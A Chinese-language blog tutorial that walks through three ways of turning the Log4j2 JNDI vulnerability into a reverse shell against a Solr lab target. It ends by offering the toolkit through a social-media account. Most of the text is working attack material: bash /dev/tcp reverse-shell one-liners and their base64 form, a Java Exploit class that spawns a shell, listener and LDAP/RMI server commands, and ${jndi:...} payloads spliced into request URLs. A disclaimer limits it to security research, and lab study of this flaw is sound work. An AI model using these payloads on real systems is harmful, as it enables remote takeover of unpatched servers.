★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、前言
明天就是除夕了,提前祝大家:新年新气象,龙年龖龖!也祝愿自己2024年一切顺利!
本文主要是分享log4j2反弹shell的3种方式,第一种方式【JNDI-Injection-Exploit】对jdk版本要求比较高,因此我在靶场复现时统一采用jdk1.8.0_191。靶场环境和漏洞原理请参阅上一篇《Log4j2漏洞(一)原理和dnslog验证》。以下是3种反弹shell复现步骤
2 、反弹shell【JNDI-Injection】
这是对环境要求最高的一种方式。
2.1、制作反弹shell的payload
# 反弹shell指令-格式
bash -i >& /dev/tcp/反弹shell的IP/nc监听的端口 0>&1
# 反弹shell指令-kali攻击机
bash -i >& /dev/tcp/192.168.242.4/9999 0>&1
# 把以上payload进行base64编码,使用在线网址:https://base64.us/
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Mi40Lzk5OTkgMD4mMQ==
2.2、监听EXP中端口
在攻击机kali使用nc命令开启监听
# 端口自定义,kali系统的ip: 192.168.242.4
nc -lvvp 9999
# 提示以下信息表示监听成功
listening on [any] 9999 ...
2.3、启动JNDI服务
使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,使用github上提供的Exploit,项目地址:https://github.com/welk1n/JNDI-Injection-Exploit ,下载下来自己编译打包,注意:编译打包要和攻击机的启动JNDI服务的jdk版本号(包含小版号)一定要一致,不然即使服务启动了,在反弹shell步骤会一直不成功。如果自己本机没有搭建jdk和maven环境的话,文末有提供下载方式。
# 切换到目标目录(我自己放jar的目录)
cd tools/log4j
# 命令-格式
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64反弹shell的payload}|{base64,-d}|{bash,-i}" -A "攻击机IP地址"
# 目标执行的命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Mi40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.242.4"
注意:每次运行 JNDI-Injection-Exploit 后,生成的rmi/ldap端口后一串字符是随机值,每次运行后URL值是不一样的。
2.4、设置payload并访问
经测试选择JDK 1.8 和JDK1.7下的rmi 和ldap都可以反弹shell成功,JDK没带版本的失败,建议跟自己环境同一版本JDK的,或者都可以测试一下。
# poc原文
${jndi:rmi://192.168.242.4:1099/fvifkk}
${jndi:ldap://192.168.242.4:1389/fvifkk}
# 拼接poc进行访问
http://your-ip:8983/solr/admin/cores?action=${jndi:rmi://192.168.242.4:1099/fvifkk}
2.5、反弹shell成功
3、反弹shell-【marshalsec】
这是最麻烦的一种方式。
3.1、生成Exploit.class
jdk要求1.8_191版本,ip修改为kali的ip,端口为nc监听的端口,源码如下:
// javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/攻击机kali机的ip/nc监听的端口 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
注意:文件命名为Exploit.java,在文件目录,打开cmd,使用命令生成Exploit.class文件,或者在kali系统上生成也可以
javac Exploit.java
然后把Exploit.class文件复制到kali系统自己指定的文件夹里面,比如:/home/kali/tools/log4j
文末我有提供Exploit.java源码文件下载方式,如果使用该方式,里面的ip和端口需要修改为自己测试机器的和监听的端口。
3.2、开启web服务能访问恶意文件
# 切换到目录
cd /home/kali/tools/log4j
# 开启web服务能访问恶意文件,kali系统的ip: 192.168.242.4
python3 -m http.server 80
直接访问:http://192.168.242.4,可以看到界面列出来当前目录下的所有文件
3.3、使用marshalsec工具开启ldap服务端
ip修改为kali的ip,端口为ldap,命令如下:
# 切换到目录
cd /home/kali/tools/log4j
# 开启ldap服务端命令
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.242.4/#Exploit" 7777
# 开启成功有以下提示信息
Listening on 0.0.0.0:7777
3.4、nc监听
监听恶意文件中的地址ip,也就是第3.1、生成Exploit.class的配置的ip和端口
# 监听命令
nc -lvvp 1234
# 监听成功有以下提示信息
listening on [any] 1234 ...
3.5、设置payload并访问
# poc原文
${jndi:ldap://192.168.242.4:7777/Exploit}
# 拼接poc进行访问
http://your-ip:8983/solr/admin/cores?action=${jndi:ldap://192.168.242.4:7777/Exploit}
3.6、反弹shell成功
4、反弹shell-【JNDIExploit】
这是最简单的一种复现方式,步骤少。
4.1、开启监听命令
# 切换到目录
cd /home/kali/tools/log4j
# 监听命令, -i 本机的ip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 6666 -i 192.168.242.4
4.2、开启nc监听
nc -lvvp 10010
4.3、设置payload并访问
# poc原文
${jndi:ldap://192.168.242.4:8888/Basic/ReverseShell/192.168.242.4/10010}
# 拼接poc进行访问
http://your-ip/solr/admin/cores?action=${jndi:ldap://192.168.242.4:8888/Basic/ReverseShell/192.168.242.4/10010}
4.4、反弹shell成功
5、资料获取
如果需要Log4j2反弹shell的工具包,请关注公众号:大象只为你,后台回复:log4j2反弹shell。
